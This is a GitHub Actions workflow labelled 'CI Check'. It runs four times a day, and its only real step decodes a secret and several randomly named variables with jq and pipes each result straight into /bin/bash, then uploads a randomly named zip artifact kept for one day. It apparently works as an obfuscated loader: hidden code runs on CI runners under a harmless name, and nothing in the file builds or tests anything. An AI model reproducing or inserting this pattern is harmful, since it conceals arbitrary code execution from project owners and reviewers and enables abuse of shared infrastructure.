name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '57 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          rbg63: ${{ secrets.rbg63 }}
        run: |
          printf '%s' "$rbg63" | jq -r .x9 | /bin/bash
          echo $u3318 | jq -r .out438 | /bin/bash
          printf '%s' "$pls0356" | jq -r .f1644 | /bin/bash
          printf '%s' "$xkjn5930" | jq -r .fhvzz39 | /bin/bash
          printf '%s' "$rthw674" | jq -r .v2071 | /bin/bash
          echo $yte36473 | jq -r .ytwx93 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: xVSr0yPv
          path: "*.zip"
          retention-days: 1
